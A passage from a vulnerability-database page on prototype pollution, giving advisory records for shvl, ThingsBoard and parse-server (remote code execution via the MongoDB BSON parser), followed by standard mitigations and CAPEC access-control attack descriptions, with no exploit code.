  "id": "GHSA-pqwc-3vhw-qcvq",
  "modified": "2024-02-01T21:00:24Z",
  "published": "2022-05-24T17:37:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robinvdvleuten/shvl/issues/34"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robinvdvleuten/shvl/pull/36"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robinvdvleuten/shvl/commit/513c0848774dfb114ad0d0554abf7927cfdd569e"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20210320222933/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "shvl vulnerable to prototype pollution"
}

GHSA-PRC2-X3QX-38M9

Vulnerability from github – Published: 2026-06-18 00:32 – Updated: 2026-06-18 00:32
VLAI
Details

ThingsBoard contains a prototype pollution vulnerability which may lead to arbitrary code execution within a sandboxed context by a user who can log in to the affected product with the tenant administrator privilege (TENANT_ADMIN).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-53676"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-17T23:17:04Z",
    "severity": "HIGH"
  },
  "details": "ThingsBoard contains a prototype pollution vulnerability which may lead to arbitrary code execution within a sandboxed context by a user who can log in to the affected product with the tenant administrator privilege (TENANT_ADMIN).",
  "id": "GHSA-prc2-x3qx-38m9",
  "modified": "2026-06-18T00:32:37Z",
  "published": "2026-06-18T00:32:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53676"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thingsboard/thingsboard/pull/15600"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN16937365"
    },
    {
      "type": "WEB",
      "url": "https://thingsboard.io/docs/releases/releases-table"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-PRM5-8G2M-24GG

Vulnerability from github – Published: 2022-11-08 17:29 – Updated: 2022-11-09 00:04
VLAI
Summary
Remote code execution via MongoDB BSON parser through prototype pollution
Details

Impact

An attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser.

Patches

Prevent prototype pollution in MongoDB database adapter.

Workarounds

Disable remote code execution through the MongoDB BSON parser.

Collaborators

Mikhail Shcherbakov (KTH), Cristian-Alexandru Staicu (CISPA) and Musard Balliu (KTH) working with Trend Micro Zero Day Initiative

References

  • https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "parse-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.10.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "parse-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-39396"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-11-08T17:29:16Z",
    "nvd_published_at": "2022-11-10T01:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nAn attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. \n\n### Patches\n\nPrevent prototype pollution in MongoDB database adapter.\n\n### Workarounds\n\nDisable remote code execution through the MongoDB BSON parser.\n\n### Collaborators\n\nMikhail Shcherbakov (KTH), Cristian-Alexandru Staicu (CISPA) and Musard Balliu (KTH) working with Trend Micro Zero Day Initiative\n\n### References\n\n- https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg\n",
  "id": "GHSA-prm5-8g2m-24gg",
  "modified": "2022-11-09T00:04:54Z",
  "published": "2022-11-08T17:29:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-prm5-8g2m-24gg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39396"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/pull/8295"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/pull/8296"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/parse-community/parse-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/releases/tag/4.10.18"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/releases/tag/5.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Remote code execution via MongoDB BSON parser through prototype pollution"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.